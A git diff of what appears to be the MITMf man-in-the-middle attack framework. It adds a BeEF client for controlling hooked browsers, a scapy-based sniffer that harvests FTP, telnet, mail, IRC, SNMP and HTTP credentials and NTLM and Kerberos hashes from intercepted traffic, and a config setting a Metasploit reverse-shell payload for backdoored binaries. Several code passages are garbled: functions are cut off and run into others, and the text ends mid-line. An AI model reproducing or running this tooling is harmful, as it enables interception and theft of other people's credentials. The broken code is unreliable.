diff --git a/.gitmodules b/.gitmodules index fbdd874..65a6dc5 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,9 +1,3 @@ [submodule "libs/bdfactory"] path = libs/bdfactory url = https://github.com/secretsquirrel/the-backdoor-factory -[submodule "libs/responder"] - path = libs/responder - url = https://github.com/byt3bl33d3r/Responder-MITMf -[submodule "core/beefapi"] - path = core/beefapi - url = https://github.com/byt3bl33d3r/beefapi diff --git a/README.md b/README.md index 3334510..e07b1ce 100644 --- a/README.md +++ b/README.md @@ -7,7 +7,7 @@ Quick tutorials, examples and dev updates at http://sign0f4.blogspot.it This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project. -**Before submitting issues please read the appropriate [section](#submitting-issues).** +**Before submitting issues please read the [FAQ](#faq) and the appropriate [section](#submitting-issues).** (Another) Dependency change! ============================ @@ -18,7 +18,7 @@ How to install on Kali ```apt-get install mitmf``` -**Currently Kali has a very old version of MITMf in it's repos, please read the [Installation](#installation) section to get the latest version** +**Currently Kali has a very old version of MITMf in it's repos so if you find bugs its normal, don't open an issue! Read the [Installation](#installation) section to get the latest version** Installation ============ @@ -27,7 +27,7 @@ If MITMf is not in your distros repo or you just want the latest version: - run the ```setup.sh``` script - run the command ```pip install -r requirements.txt``` to install all python dependencies -On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ```ImportError: no module named pcap``` run ```apt-get install python-pycap``` to fix it. +On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ```ImportError: no module named pcap``` run ```apt-get install python-pypcap``` to fix it. Availible plugins ================= @@ -86,3 +86,20 @@ If you find a *bug* please open an issue and include at least the following in t - OS your using Also remember: Github markdown is your friend! + +FAQ +=== +- **Is Windows supported?** +- No, I'm not masochistic and I actually want things to work. + +- **I can't install package X because of an error!** +- Try installing the module via ```pip``` or your distros package manager. This *isn't* a problem with MITMf. + +- **How do I install package X?** +- Please read the [installation](#installation) guide. + +- **I get an ImportError when launching MITMf!** +- Please read the [installation](#installation) guide. + +- **Dude, no documentation/video tutorials?** +- Currently no, once the framework hits 1.0 I'll probably start writing/making some. diff --git a/config/mitmf.conf b/config/mitmf.conf index 58d82e5..614ac72 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -400,7 +400,7 @@ SUPPLIED_SHELLCODE = None ZERO_CERT = True PATCH_DLL = False - MSFPAYLOAD = windows/x64/shell_reverse_tcp + MSFPAYLOAD = windows/x64/shell/reverse_tcp [[[[MachoIntelx86]]]] SHELL = reverse_shell_tcp diff --git a/core/beefapi b/core/beefapi deleted file mode 160000 index 28d2fef..0000000 --- a/core/beefapi +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 28d2fef986e217425cb621701f267e40425330c4 diff --git a/core/beefapi.py b/core/beefapi.py new file mode 100644 index 0000000..e8d2ec3 --- /dev/null +++ b/core/beefapi.py @@ -0,0 +1,171 @@ +#!/usr/bin/env python +import requests +import json +import logging +from random import sample +from string import lowercase, digits + +logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message + +class BeefAPI: + + def __init__(self, opts=[]): + self.host = "127.0.0.1" or opts.get(host) + self.port = "3000" or opts.get(port) + self.token = None + self.url = "http://%s:%s/api/" % (self.host, self.port) + self.login_url = self.url + "admin/login" + self.hookurl = self.url + "hooks?token=" + self.mod_url = self.url + "modules?token=" + self.log_url = self.url + "logs?token=" + + def random_url(self): + return "".join(sample(digits + lowercase, 8)) + + def login(self, username, password): + try: + auth = json.dumps({"username": username, "password": password}) + r = requests.post(self.login_url, data=auth) + data = r.json() + + if (r.status_code == 200) and (data["success"]): + self.token = data["token"] #Auth token + return True + elif r.status_code != 200: + return False + + except Exception, e: + print "beefapi ERROR: %s" % e + + def sessions_online(self): + return self.get_sessions("online", "session") + + def sessions_offline(self): + return self.get_sessions("offline", "session") + + def session2host(self, session): + return self.conversion(session, "ip") + + def session2id(self, session): + return self.conversion(session, "id") + + def hook_info(self, hook): #Returns parsed information on a session + session = self.conversion(hook, "session") + url = self.hookurl + self.token + r = requests.get(url).json() + + try: + states = ["online", "offline"] + for state in states: + for v in r["hooked-browsers"][state].items(): + if v[1]["session"] == session: + return v[1] + except IndexError: + pass + + def hook_info_all(self, hook): + session = self.conversion(hook, "session") + url = self.url + "hooks/%s?token=%s" % (session, self.token) + return requests.get(url).json() + + def hook_logs(self, hook): + session = self.conversion(hook, "session") + url = self.url + "logs/%s?token=%s" % (session, self.token) + return requests.get(url).json() + + def hosts_online(self): + return self.get_sessions("online", "ip") + + def hosts_offline(self): + return self.get_sessions("offline", "ip") + + def host2session(self, host): + return self.conversion(host, "session") + + def host2id(self, host): + return self.conversion(host, "id") + + def ids_online(self): + return self.get_sessions("online", "id") + + def ids_offline(self): + return self.get_sessions("offline", "id") + + def id2session(self, id): + return self.conversion(id, "session") + + def id2host(self, id): + return self.conversion(id, "ip") + + def module_id(self, name): #Returns module id + url = self.mod_url + self.token + try: + r = requests.get(url).json() + for v in r.values(): + if v["name"] == name: + return v["id"] + except Exception, e: + print "beefapi ERROR: %s" % e + + def module_name(self, id): #Returns module name + url = self.mod_url + self.token + try: + r = requests.get(url).json() + for v in r.values(): + if v["id"] == id: + return v["name"] + except Exception, e: + print "beefapi ERROR: %s" % e + + def module_run(self, hook, mod_id, options={}): #Executes a module on a specified session + try: + session = self.conversion(hook, "session") + headers = {"Content-Type": "application/json", "charset": "UTF-8"} + payload = json.dumps(options) + url = self.url + "modules/%s/%s?token=%s" % (session, mod_id, self.token) + return requests.post(url, headers=headers, data=payload).json() + except Exception, e: + print "beefapi ERROR: %s" % e + + def module_results(self, hook, mod_id, cmd_id): + session = self.conversion(hook, "session") + url = self.mod_url + "%s/%s/%s?token=%s" % (session, mod_id, cmd_id, self.token) + return requests.get(url).json() + + def modules_list(self): + return requests.get(self.mod_url + self.token).json() + + def module_info(self, id): + url = self.url + "modules/%s?token=%s" % (id, self.token) + return requests.get(url).json() + + def logs(self): + return requests.get(self.log_url + self.token).json() + + def conversion(self, value, return_value): #Helper function for all conversion functions + url = self.hookurl + self.token + try: + r = requests.get(url).json() + states = ["online", "offline"] + for state in states: + for v in r["hooked-browsers"][state].items(): + for r in v[1].values(): + if str(value) == str(r): + return v[1][return_value] + + except Exception, e: + print "beefapi ERROR: %s" % e + + except IndexError: + pass + + def get_sessions(self, state, value): #Helper function + try: + hooks = [] + r = requests.get(self.hookurl + self.token).json() + for v in r["hooked-browsers"][state].items(): + hooks.append(v[1][value]) + + return hooks + except Exception, e: + print "beefapi ERROR: %s" % e diff --git a/core/configwatcher.py b/core/configwatcher.py index 0a2e570..e6eaaaf 100644 --- a/core/configwatcher.py +++ b/core/configwatcher.py @@ -1,13 +1,12 @@ #! /usr/bin/env python2.7 import logging - -logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages from watchdog.observers import Observer from watchdog.events import FileSystemEventHandler - from configobj import ConfigObj +logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages + mitmf_logger = logging.getLogger('mitmf') class ConfigWatcher(FileSystemEventHandler): diff --git a/core/dnschef/dnschef.py b/core/dnschef/DNSchef.py similarity index 100% rename from core/dnschef/dnschef.py rename to core/dnschef/DNSchef.py diff --git a/core/msfrpc.py b/core/msfrpc.py index 59913ec..f722875 100644 --- a/core/msfrpc.py +++ b/core/msfrpc.py @@ -20,66 +20,69 @@ # USA # -import requests import msgpack +import logging +import requests + +logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message class Msfrpc: - class MsfError(Exception): - def __init__(self,msg): - self.msg = msg - def __str__(self): - return repr(self.msg) + class MsfError(Exception): + def __init__(self,msg): + self.msg = msg + def __str__(self): + return repr(self.msg) - class MsfAuthError(MsfError): - def __init__(self,msg): - self.msg = msg - - def __init__(self,opts=[]): - self.host = opts.get('host') or "127.0.0.1" - self.port = opts.get('port') or "55552" - self.uri = opts.get('uri') or "/api/" - self.ssl = opts.get('ssl') or False - self.token = None - self.headers = {"Content-type" : "binary/message-pack"} + class MsfAuthError(MsfError): + def __init__(self,msg): + self.msg = msg + + def __init__(self,opts=[]): + self.host = opts.get('host') or "127.0.0.1" + self.port = opts.get('port') or "55552" + self.uri = opts.get('uri') or "/api/" + self.ssl = opts.get('ssl') or False + self.token = None + self.headers = {"Content-type" : "binary/message-pack"} - def encode(self, data): - return msgpack.packb(data) + def encode(self, data): + return msgpack.packb(data) - def decode(self, data): - return msgpack.unpackb(data) + def decode(self, data): + return msgpack.unpackb(data) - def call(self, method, opts=[]): - if method != 'auth.login': - if self.token == None: - raise self.MsfAuthError("MsfRPC: Not Authenticated") + def call(self, method, opts=[]): + if method != 'auth.login': + if self.token == None: + raise self.MsfAuthError("MsfRPC: Not Authenticated") - if method != "auth.login": - opts.insert(0, self.token) + if method != "auth.login": + opts.insert(0, self.token) - if self.ssl == True: - url = "https://%s:%s%s" % (self.host, self.port, self.uri) - else: - url = "http://%s:%s%s" % (self.host, self.port, self.uri) - + if self.ssl == True: + url = "https://%s:%s%s" % (self.host, self.port, self.uri) + else: + url = "http://%s:%s%s" % (self.host, self.port, self.uri) + - opts.insert(0, method) - payload = self.encode(opts) + opts.insert(0, method) + payload = self.encode(opts) - r = requests.post(url, data=payload, headers=self.headers) + r = requests.post(url, data=payload, headers=self.headers) - opts[:] = [] #Clear opts list - - return self.decode(r.content) + opts[:] = [] #Clear opts list + + return self.decode(r.content) - def login(self, user, password): - auth = self.call("auth.login", [user, password]) - try: - if auth['result'] == 'success': - self.token = auth['token'] - return True - except: - raise self.MsfAuthError("MsfRPC: Authentication failed") + def login(self, user, password): + auth = self.call("auth.login", [user, password]) + try: + if auth['result'] == 'success': + self.token = auth['token'] + return True + except: + raise self.MsfAuthError("MsfRPC: Authentication failed") if __name__ == '__main__': diff --git a/core/netcreds/NetCreds.py b/core/netcreds/NetCreds.py new file mode 100644 index 0000000..0bfef7a --- /dev/null +++ b/core/netcreds/NetCreds.py @@ -0,0 +1,907 @@ +#!/usr/bin/env python2 + +import logging +import binascii +import struct +import base64 +import threading +import binascii + +from os import geteuid, devnull +from sys import exit +from urllib import unquote +from collections import OrderedDict +from BaseHTTPServer import BaseHTTPRequestHandler +from StringIO import StringIO +from urllib import unquote + +# shut up scapy +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) +from scapy.all import * +conf.verb=0 + +mitmf_logger = logging.getLogger('mitmf') + +DN = open(devnull, 'w') +pkt_frag_loads = OrderedDict() +challenge_acks = OrderedDict() +mail_auths = OrderedDict() +telnet_stream = OrderedDict() + +# Regexs +authenticate_re = '(www-|proxy-)?authenticate' +authorization_re = '(www-|proxy-)?authorization' +ftp_user_re = r'USER (.+)\r\n' +ftp_pw_re = r'PASS (.+)\r\n' +irc_user_re = r'NICK (.+?)((\r)?\n|\s)' +irc_pw_re = r'NS IDENTIFY (.+)' +irc_pw_re2 = 'nickserv :identify (.+)' +mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)' +mail_auth_re1 = '(\d+ )?login ' +NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+' +NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+' +# Prone to false+ but prefer that to false- +http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))' + +class NetCreds: + + def sniffer(self, myip, interface): + #set the filter to our ip to prevent capturing traffic coming/going from our box + sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(myip), store=0) + #sniff(iface=interface, prn=pkt_parser, store=0) + + def start(self, myip, interface): + t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, myip,)) + t.setDaemon(True) + t.start() + +def pkt_parser(pkt): + ''' + Start parsing packets here + ''' + global pkt_frag_loads, mail_auths + + if pkt.haslayer(Raw): + load = pkt[Raw].load + + # Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control + if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6): + return + + # UDP + if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw): + + src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport) + dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport) + + # SNMP community strings + if pkt.haslayer(SNMP): + parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP]) + return + + # Kerberos over UDP + decoded = Decode_Ip_Packet(str(pkt)[14:]) + kerb_hash = ParseMSKerbv5UDP(decoded['data'][8:]) + if kerb_hash: + printer(src_ip_port, dst_ip_port, kerb_hash) + + # TCP + elif pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP): + + ack = str(pkt[TCP].ack) + seq = str(pkt[TCP].seq) + src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport) + dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport) + frag_remover(ack, load) + pkt_frag_loads[src_ip_port] = frag_joiner(ack, src_ip_port, load) + full_load = pkt_frag_loads[src_ip_port][ack] + + # Limit the packets we regex to increase efficiency + # 750 is a bit arbitrary but some SMTP auth success pkts + # are 500+ characters + if 0 < len(full_load) < 750: + + # FTP + ftp_creds = parse_ftp(full_load, dst_ip_port) + if len(ftp_creds) > 0: + for msg in ftp_creds: + printer(src_ip_port, dst_ip_port, msg) + return + + # Mail + mail_creds_found = mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq) + + # IRC + irc_creds = irc_logins(full_load, pkt) + if irc_creds != None: + printer(src_ip_port, dst_ip_port, irc_creds) + return + + # Telnet + telnet_logins(src_ip_port, dst_ip_port, load, ack, seq) + + # HTTP and other protocols that run on TCP + a raw load + other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt) + +def frag_remover(ack, load): + ''' + Keep the FILO OrderedDict of frag loads from getting too large + 3 points of limit: + Number of ip_ports < 50 + Number of acks per ip:port < 25 + Number of chars in load < 5000 + ''' + global pkt_frag_loads + + # Keep the number of IP:port mappings below 50 + # last=False pops the oldest item rather than the latest + while len(pkt_frag_loads) > 50: + pkt_frag_loads.popitem(last=False) + + # Loop through a deep copy dict but modify the original dict + copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) + for ip_port in copy_pkt_frag_loads: + if len(copy_pkt_frag_loads[ip_port]) > 0: + # Keep 25 ack:load's per ip:port + while len(copy_pkt_frag_loads[ip_port]) > 25: + pkt_frag_loads[ip_port].popitem(last=False) + + # Recopy the new dict to prevent KeyErrors for modifying dict in loop + copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) + for ip_port in copy_pkt_frag_loads: + # Keep the load less than 75,000 chars + for ack in copy_pkt_frag_loads[ip_port]: + # If load > 5000 chars, just keep the last 200 chars + if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: + pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:] + +def frag_joiner(ack, src_ip_port, load): + ''' + Keep a store of previous fragments in an OrderedDict named pkt_frag_loads + ''' + for ip_port in pkt_frag_loads: + if src_ip_port == ip_port: + if ack in pkt_frag_loads[src_ip_port]: + # Make pkt_frag_loads[src_ip_port][ack] = full load + old_load = pkt_frag_loads[src_ip_port][ack] + concat_load = old_load + load + return OrderedDict([(ack, concat_load)]) + + return OrderedDict([(ack, load)]) + +def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq): + ''' + Catch telnet logins and passwords + ''' + global telnet_stream + + msg = None + + if src_ip_port in telnet_stream: + # Do a utf decode in case the client sends telnet options before their username + # No one would care to see that + try: + telnet_stream[src_ip_port] += load.decode('utf8') + except UnicodeDecodeError: + pass + + # \r or \r\n or \n terminate commands in telnet if my pcaps are to be believed + if '\r' in telnet_stream[src_ip_port] or '\n' in telnet_stream[src_ip_port]: + telnet_split = telnet_stream[src_ip_port].split(' ', 1) + cred_type = telnet_split[0] + value = telnet_split[1].replace('\r\n', '').replace('\r', '').replace('\n', '') + # Create msg, the return variable + msg = 'Telnet %s: %s' % (cred_type, value) + printer(src_ip_port, dst_ip_port, msg) + del telnet_stream[src_ip_port] + + # This part relies on the telnet packet ending in + # "login:", "password:", or "username:" and being <750 chars + # Haven't seen any false+ but this is pretty general + # might catch some eventually + # maybe use dissector.py telnet lib? + if len(telnet_stream) > 100: + telnet_stream.popitem(last=False) + mod_load = load.lower().strip() + if mod_load.endswith('username:') or mod_load.endswith('login:'): + telnet_stream[dst_ip_port] = 'username ' + elif mod_load.endswith('password:'): + telnet_stream[dst_ip_port] = 'password ' + +def ParseMSKerbv5TCP(Data): + ''' + Taken from Pcredz because I didn't want to spend the time doing this myself + I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel? + Maybe replace this eventually with the kerberos python lib + Parses Kerberosv5 hashes from packets + ''' + try: + MsgType = Data[21:22] + EncType = Data[43:44] + MessageType = Data[32:33] + except IndexError: + return + + if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02": + if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33": + HashLen = struct.unpack(' 1: + lines = full_load.count('\r\n') + if lines > 1: + full_load = full_load.split('\r\n')[-2] # -1 is '' + return full_load + +def parse_ftp(full_load, dst_ip_port): + ''' + Parse out FTP creds + ''' + print_strs = [] + + # Sometimes FTP packets double up on the authentication lines + # We just want the lastest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n" + full_load = double_line_checker(full_load, 'USER') + + # FTP and POP potentially use idential client > server auth pkts + ftp_user = re.match(ftp_user_re, full_load) + ftp_pass = re.match(ftp_pw_re, full_load) + + if ftp_user: + msg1 = 'FTP User: %s' % ftp_user.group(1).strip() + print_strs.append(msg1) + if dst_ip_port[-3:] != ':21': + msg2 = 'Nonstandard FTP port, confirm the service that is running on it' + print_strs.append(msg2) + + elif ftp_pass: + msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip() + print_strs.append(msg1) + if dst_ip_port[-3:] != ':21': + msg2 = 'Nonstandard FTP port, confirm the service that is running on it' + print_strs.append(msg2) + + return print_strs + +def mail_decode(src_ip_port, dst_ip_port, mail_creds): + ''' + Decode base64 mail creds + ''' + try: + decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8') + decoded = decoded.replace('\x00', ' ') + except TypeError: + decoded = None + except UnicodeDecodeError as e: + decoded = None + + if decoded != None: + msg = 'Decoded: %s' % decoded + printer(src_ip_port, dst_ip_port, msg) + +def mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq): + ''' + Catch IMAP, POP, and SMTP logins + ''' + # Handle the first packet of mail authentication + # if the creds aren't in the first packet, save it in mail_auths + + # mail_auths = 192.168.0.2 : [1st ack, 2nd ack...] + global mail_auths + found = False + + # Sometimes mail packets double up on the authentication lines + # We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n" + full_load = double_line_checker(full_load, 'auth') + + # Client to server 2nd+ pkt + if src_ip_port in mail_auths: + if seq in mail_auths[src_ip_port][-1]: + stripped = full_load.strip('\r\n') + try: + decoded = base64.b64decode(stripped) + msg = 'Mail authentication: %s' % decoded + printer(src_ip_port, dst_ip_port, msg) + except TypeError: + pass + mail_auths[src_ip_port].append(ack) + + # Server responses to client + # seq always = last ack of tcp stream + elif dst_ip_port in mail_auths: + if seq in mail_auths[dst_ip_port][-1]: + # Look for any kind of auth failure or success + a_s = 'Authentication successful' + a_f = 'Authentication failed' + # SMTP auth was successful + if full_load.startswith('235') and 'auth' in full_load.lower(): + # Reversed the dst and src + printer(dst_ip_port, src_ip_port, a_s) + found = True + try: + del mail_auths[dst_ip_port] + except KeyError: + pass + # SMTP failed + elif full_load.startswith('535 '): + # Reversed the dst and src + printer(dst_ip_port, src_ip_port, a_f) + found = True + try: + del mail_auths[dst_ip_port] + except KeyError: + pass + # IMAP/POP/SMTP failed + elif ' fail' in full_load.lower(): + # Reversed the dst and src + printer(dst_ip_port, src_ip_port, a_f) + found = True + try: + del mail_auths[dst_ip_port] + except KeyError: + pass + # IMAP auth success + elif ' OK [' in full_load: + # Reversed the dst and src + printer(dst_ip_port, src_ip_port, a_s) + found = True + try: + del mail_auths[dst_ip_port] + except KeyError: + pass + + # Pkt was not an auth pass/fail so its just a normal server ack + # that it got the client's first auth pkt + else: + if len(mail_auths) > 100: + mail_auths.popitem(last=False) + mail_auths[dst_ip_port].append(ack) + + # Client to server but it's a new TCP seq + # This handles most POP/IMAP/SMTP logins but there's at least one edge case + else: + mail_auth_search = re.match(mail_auth_re, full_load, re.IGNORECASE) + if mail_auth_search != None: + auth_msg = full_load + # IMAP uses the number at the beginning + if mail_auth_search.group(1) != None: + auth_msg = auth_msg.split()[1:] + else: + auth_msg = auth_msg.split() + # Check if its a pkt like AUTH PLAIN dvcmQxIQ== + # rather than just an AUTH PLAIN + if len(auth_msg) > 2: + mail_creds = ' '.join(auth_msg[2:]) + msg = 'Mail authentication: %s' % mail_creds + printer(src_ip_port, dst_ip_port, msg) + + mail_decode(src_ip_port, dst_ip_port, mail_creds) + try: + del mail_auths[src_ip_port] + except KeyError: + pass + found = True + + # Mail auth regex was found and src_ip_port is not in mail_auths + # Pkt was just the initial auth cmd, next pkt from client will hold creds + if len(mail_auths) > 100: + mail_auths.popitem(last=False) + mail_auths[src_ip_port] = [ack] + + # At least 1 mail login style doesn't fit in the original regex: + # 1 login "username" "password" + # This also catches FTP authentication! + # 230 Login successful. + elif re.match(mail_auth_re1, full_load, re.IGNORECASE) != None: + + # FTP authentication failures trigger this + #if full_load.lower().startswith('530 login'): + # return + + auth_msg = full_load + auth_msg = auth_msg.split() + if 2 < len(auth_msg) < 5: + mail_creds = ' '.join(auth_msg[2:]) + msg = 'Authentication: %s' % mail_creds + printer(src_ip_port, dst_ip_port, msg) + mail_decode(src_ip_port, dst_ip_port, mail_creds) + found = True + + if found == True: + return True + +def irc_logins(full_load, pkt): + ''' + Find IRC logins + ''' + user_search = re.match(irc_user_re, full_load) + pass_search = re.match(irc_pw_re, full_load) + pass_search2 = re.search(irc_pw_re2, full_load.lower()) + if user_search: + msg = 'IRC nick: %s' % user_search.group(1) + return msg + if pass_search: + msg = 'IRC pass: %s' % pass_search.group(1) + return msg + if pass_search2: + msg = 'IRC pass: %s' % pass_search2.group(1) + return msg + +def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt): + ''' + Pull out pertinent info from the parsed HTTP packet data + ''' + user_passwd = None + http_url_req = None + method = None + http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] + http_line, header_lines, body = parse_http_load(full_load, http_methods) + headers = headers_to_dict(header_lines) + if 'host' in headers: + host = headers['host'] + else: + host = '' + + #if http_line != None: + # method, path = parse_http_line(http_line, http_methods) + # http_url_req = get_http_url(method, host, path, headers) + #if http_url_req != None: + #printer(src_ip_port, None, http_url_req) + + # Print search terms + searched = get_http_searches(http_url_req, body, host) + if searched: + printer(src_ip_port, dst_ip_port, searched) + + #We dont need this cause its being taking care of by the proxy + + #Print user/pwds + #if body != '': + # user_passwd = get_login_pass(body) + # if user_passwd != None: + # try: + # http_user = user_passwd[0].decode('utf8') + # http_pass = user_passwd[1].decode('utf8') + # # Set a limit on how long they can be prevent false+ + # if len(http_user) > 75 or len(http_pass) > 75: + # return + # user_msg = 'HTTP username: %s' % http_user + # printer(src_ip_port, dst_ip_port, user_msg) + # pass_msg = 'HTTP password: %s' % http_pass + # printer(src_ip_port, dst_ip_port, pass_msg) + # except UnicodeDecodeError: + # pass + + # Print POST loads + # ocsp is a common SSL post load that's never interesting + #if method == 'POST' and 'ocsp.' not in host: + # try: + # msg = 'POST load: %s' % body.encode('utf8') + # printer(src_ip_port, None, msg) + # except UnicodeDecodeError: + # pass + + # Kerberos over TCP + decoded = Decode_Ip_Packet(str(pkt)[14:]) + kerb_hash = ParseMSKerbv5TCP(decoded['data'][20:]) + if kerb_hash: + printer(src_ip_port, dst_ip_port, kerb_hash) + + # Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL) + NTLMSSP2 = re.search(NTLMSSP2_re, full_load, re.DOTALL) + NTLMSSP3 = re.search(NTLMSSP3_re, full_load, re.DOTALL) + if NTLMSSP2: + parse_ntlm_chal(NTLMSSP2.group(), ack) + if NTLMSSP3: + ntlm_resp_found = parse_ntlm_resp(NTLMSSP3.group(), seq) + if ntlm_resp_found != None: + printer(src_ip_port, dst_ip_port, ntlm_resp_found) + + # Look for authentication headers + if len(headers) == 0: + authenticate_header = None + authorization_header = None + for header in headers: + authenticate_header = re.match(authenticate_re, header) + authorization_header = re.match(authorization_re, header) + if authenticate_header or authorization_header: + break + + if authorization_header or authenticate_header: + # NETNTLM + netntlm_found = parse_netntlm(authenticate_header, authorization_header, headers, ack, seq) + if netntlm_found != None: + printer(src_ip_port, dst_ip_port, netntlm_found) + + # Basic Auth + parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header) + +def get_http_searches(http_url_req, body, host): + ''' + Find search terms from URLs. Prone to false positives but rather err on that side than false negatives + search, query, ?s, &q, ?q, search?p, searchTerm, keywords, command + ''' + false_pos = ['i.stack.imgur.com'] + + searched = None + if http_url_req != None: + searched = re.search(http_search_re, http_url_req, re.IGNORECASE) + if searched == None: + searched = re.search(http_search_re, body, re.IGNORECASE) + + if searched != None and host not in false_pos: + searched = searched.group(3) + # Eliminate some false+ + try: + # if it doesn't decode to utf8 it's probably not user input + searched = searched.decode('utf8') + except UnicodeDecodeError: + return + # some add sites trigger this function with single digits + if searched in [str(num) for num in range(0,10)]: + return + # nobody's making >100 character searches + if len(searched) > 100: + return + msg = 'Searched %s: %s' % (host, unquote(searched.encode('utf8')).replace('+', ' ')) + return msg + +def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header): + ''' + Parse basic authentication over HTTP + ''' + if authorization_header: + # authorization_header sometimes is triggered by failed ftp + try: + header_val = headers[authorization_header.group()] + except KeyError: + return + b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE) + if b64_auth_re != None: + basic_auth_b64 = b64_auth_re.group(1) + basic_auth_creds = base64.decodestring(basic_auth_b64) + msg = 'Basic Authentication: %s' % basic_auth_creds + printer(src_ip_port, dst_ip_port, msg) + +def parse_netntlm(authenticate_header, authorization_header, headers, ack, seq): + ''' + Parse NTLM hashes out + ''' + # Type 2 challenge from server + if authenticate_header != None: + chal_header = authenticate_header.group() + parse_netntlm_chal(headers, chal_header, ack) + + # Type 3 response from client + elif authorization_header != None: + resp_header = authorization_header.group() + msg = parse_netntlm_resp_msg(headers, resp_header, seq) + if msg != None: + return msg + +def parse_snmp(src_ip_port, dst_ip_port, snmp_layer): + ''' + Parse out the SNMP version and community string + ''' + if type(snmp_layer.community.val) == str: + ver = snmp_layer.version.val + msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val) + printer(src_ip_port, dst_ip_port, msg) + return True + +def get_http_url(method, host, path, headers): + ''' + Get the HTTP method + URL from requests + ''' + if method != None and path != None: + + # Make sure the path doesn't repeat the host header + if host != '' and not re.match('(http(s)?://)?'+host, path): + http_url_req = method + ' ' + host + path + else: + http_url_req = method + ' ' + path + + http_url_req = url_filter(http_url_req) + + return http_url_req + +def headers_to_dict(header_lines): + ''' + Convert the list of header lines into a dictionary + ''' + headers = {} + # Incomprehensible list comprehension flattens list of headers + # that are each split at ': ' + # http://stackoverflow.com/a/406296 + headers_list = [x for line in header_lines for x in line.split(': ', 1)] + headers_dict = dict(zip(headers_list[0::2], headers_list[1::2])) + # Make the header key (like "Content-Length") lowercase + for header in headers_dict: + headers[header.lower()] = headers_dict[header] + + return headers + +def parse_http_line(http_line, http_methods): + ''' + Parse the header with the HTTP method in it + ''' + http_line_split = http_line.split() + method = '' + path = '' + + # Accounts for pcap files that might start with a fragment + # so the first line might be just text data + if len(http_line_split) > 1: + method = http_line_split[0] + path = http_line_split[1] + + # This check exists because responses are much different than requests e.g.: + # HTTP/1.1 407 Proxy Authentication Required ( Access is denied. ) + # Add a space to method because there's a space in http_methods items + # to avoid false+ + if method+' ' not in http_methods: + method = None + path = None + + return method, path + +def parse_http_load(full_load, http_methods): + ''' + Split the raw load into list of headers and body string + ''' + try: + headers, body = full_load.split("\r\n\r\n", 1) + except ValueError: + headers = full_load + body = '' + header_lines = headers.split("\r\n") + + # Pkts may just contain hex data and no headers in which case we'll + # still want to parse them for usernames and password + http_line = get_http_line(header_lines, http_methods) + if not http_line: + headers = '' + body = full_load + + header_lines = [line for line in header_lines if line != http_line] + + return http_line, header_lines, body + +def get_http_line(header_lines, http_methods): + ''' + Get the header with the http command + ''' + for header in header_lines: + for method in http_methods: + # / is the only char I can think of that's in every http_line + # Shortest valid: "GET /", add check for "/"? + if header.startswith(method): + http_line = header + return http_line + +def parse_netntlm_chal(headers, chal_header, ack): + ''' + Parse the netntlm server challenge + https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py + ''' + try: + header_val2 = headers[chal_header] + except KeyError: + return + header_val2 = header_val2.split(' ', 1) + # The header value can either start with NTLM or Negotiate + if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate': + msg2 = header_val2[1] + msg2 = base64.decodestring(msg2) + parse_ntlm_chal(ack, msg2) + +def parse_ntlm_chal(msg2, ack): + ''' + Parse server challenge + ''' + global challenge_acks + + Signature = msg2[0:8] + try: + msg_type = struct.unpack(" 50: + challenge_acks.popitem(last=False) + challenge_acks[ack] = ServerChallenge + +def parse_netntlm_resp_msg(headers, resp_header, seq): + ''' + Parse the client response to the challenge + ''' + try: + header_val3 = 